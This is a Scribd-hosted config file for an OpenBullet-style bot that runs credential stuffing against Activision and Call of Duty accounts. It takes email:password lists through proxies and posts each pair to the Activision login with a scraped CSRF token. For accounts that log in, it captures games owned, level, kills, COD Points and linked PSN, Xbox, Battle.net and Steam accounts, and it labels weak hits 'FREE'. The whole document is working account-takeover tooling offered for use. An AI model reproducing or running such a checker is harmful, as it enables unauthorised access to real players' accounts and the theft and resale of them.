100% found this document useful (1 vote)
435 views4 pages

COD Loli

The document contains settings for a bot that logs into a Call of Duty account, checks account details like username, games owned, level, kills, currency, and linked platforms. It makes several API requests, parses the responses, and checks for certain conditions before labeling the account as "FREE".

Uploaded by

punit soni
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
100% found this document useful (1 vote)
435 views4 pages

COD Loli

The document contains settings for a bot that logs into a Call of Duty account, checks account details like username, games owned, level, kills, currency, and linked platforms. It makes several API requests, parses the responses, and checks for certain conditions before labeling the account as "FREE".

Uploaded by

punit soni
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

[SETTINGS]

{
"Name": "COD",
"SuggestedBots": 100,
"MaxCPM": 0,
"LastModified": "2021-04-06T02:23:18.8852535-06:00",
"AdditionalInfo": "",
"RequiredPlugins": [],
"Author": "RedzYT",
"Version": "1.2.2",
"SaveEmptyCaptures": false,
"ContinueOnCustom": false,
"SaveHitsToTextFile": false,
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": true,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"BanLoopEvasionOverride": -1,
"EncodeData": false,
"AllowedWordlist1": "MailPass",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"QuitOnBanRetry": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://s.activision.com/activision/login"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36


(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

PARSE "<SOURCE>" LR "name=\"_csrf\" content=\"" "\"/>" -> VAR "_csrf"

REQUEST POST "https://s.activision.com/do_login?new_SiteId=activision"


CONTENT "username=<USER>&remember_me=true&password=<PASS>&_csrf=<_csrf>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/a
png,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
HEADER "Accept-Encoding: gzip, deflate, br"
HEADER "Accept-Language: en-US,en;q=0.9,fr;q=0.8,ar;q=0.7"
HEADER "Cache-Control: no-cache"
HEADER "Connection: keep-alive"
HEADER "Content-Length: 145"
HEADER "Content-Type: application/x-www-form-urlencoded"
HEADER "Host: s.activision.com"
HEADER "Origin: https://s.activision.com"
HEADER "Pragma: no-cache"
HEADER "Referer: https://s.activision.com/activision/login"
HEADER "sec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A
Brand\";v=\"99\""
HEADER "sec-ch-ua-mobile: ?0"
HEADER "Sec-Fetch-Dest: document"
HEADER "Sec-Fetch-Mode: navigate"
HEADER "Sec-Fetch-Site: same-origin"
HEADER "Sec-Fetch-User: ?1"
HEADER "Upgrade-Insecure-Requests: 1"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36"

KEYCHECK
KEYCHAIN Failure OR
KEY "<COOKIES(*)>" Contains "LOGIN_FAILURE"
KEY "<COOKIES{*}>" Contains "LOGIN_FAILURE"
KEY "<RESPONSECODE>" EqualTo "302"
KEYCHAIN Success OR
KEY "<COOKIES(*)>" Contains "atkn"
KEY "<COOKIES{*}>" Contains "atkn"
KEYCHAIN Ban OR
KEY "Captcha error. Please try again.</"

REQUEST GET "https://my.callofduty.com/api/papi-


client/crm/cod/v2/identities/<COOKIES(ACT_SSO_COOKIE)>"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)


like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

#US PARSE "<SOURCE>" JSON "username" -> VAR "US"

#g PARSE "<SOURCE>" JSON "title" Recursive=TRUE -> VAR "Games1"

#p PARSE "<SOURCE>" JSON "platform" Recursive=TRUE -> VAR "P"

#Platforms FUNCTION Translate StopAfterFirstMatch=FALSE


KEY "xbl" VALUE "Xbox"
KEY "psn" VALUE "Psn"
KEY "battle" VALUE "Blizzard"
KEY "steam" VALUE "Steam"
"<P>" -> CAP "Platforms"

KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Custom "FREE" OR
KEY "<Platforms>" Contains "[]"
KEY "<Games1>" Contains "[]"
KEY "<Games1>" DoesNotContain "cw"

#Games FUNCTION Translate StopAfterFirstMatch=FALSE


KEY "wwii" VALUE "COD WWII"
KEY "bo4" VALUE "COD Black Ops4"
KEY "mw" VALUE "COD Modern Warfare"
KEY "cw" VALUE "COD Cold War"
"<Games1>" -> CAP "Games"
#p2 PARSE "<SOURCE>" JSON "platform" -> VAR "p2"

#GET_LVL REQUEST GET "https://my.callofduty.com/api/papi-


client/stats/cod/v1/title/cw/platform/<p2>/gamer/<US>/profile/type/cw"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)


like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

#Kills FUNCTION Constant "0" -> VAR "Kills"

#Level FUNCTION Constant "0" -> VAR "Level"

#Kills PARSE "<SOURCE>" JSON "kills" CreateEmpty=FALSE -> CAP "Kills"

#LVL PARSE "<SOURCE>" JSON "level" CreateEmpty=FALSE -> CAP "Level"

#Free KEYCHECK BanOnToCheck=FALSE


KEYCHAIN Custom "FREE" OR
KEY "<Level>" EqualTo "0"
KEY "<Kills>" EqualTo "0"
KEY "[<Level>]" Contains "[]"
KEY "[<Kills>]" Contains "[]"

REQUEST GET "https://www.callofduty.com/api/papi-


client/inventory/v1/title/cw/platform/<p2>/gamer/<US>/currency"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)


like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

#Cod_Points FUNCTION Constant "0" -> VAR "Cod Points"

#Cod_Points PARSE "<SOURCE>" JSON "codPoints" CreateEmpty=FALSE -> CAP "Cod Points"

#GET_LINK REQUEST GET "https://profile.callofduty.com/cod/profile"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0)


like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

#def1 FUNCTION Constant "Null" -> VAR "PSN LINKED"

#def2 FUNCTION Constant "Null" -> VAR "BLLIZARD LINKED"

#def3 FUNCTION Constant "Null" -> VAR "XBOX LINKED"

#def4 FUNCTION Constant "Null" -> VAR "STEAM LINKED"

#PSN PARSE "<SOURCE>" LR "Playstation Account: " "</span>" CreateEmpty=FALSE -> CAP
"PSN LINKED"

#BLLIZARD PARSE "<SOURCE>" LR "Battle.net Account: " "</span" CreateEmpty=FALSE ->


CAP "BLLIZARD LINKED"
#XBOX PARSE "<SOURCE>" LR "XBOX Live Account: " "</span" CreateEmpty=FALSE -> CAP
"XBOX LINKED"

#STEAM PARSE "<SOURCE>" LR "Steam Account: " "</span" CreateEmpty=FALSE -> CAP
"STEAM LINKED"

FUNCTION Constant "RedzYT" -> CAP "By"

You might also like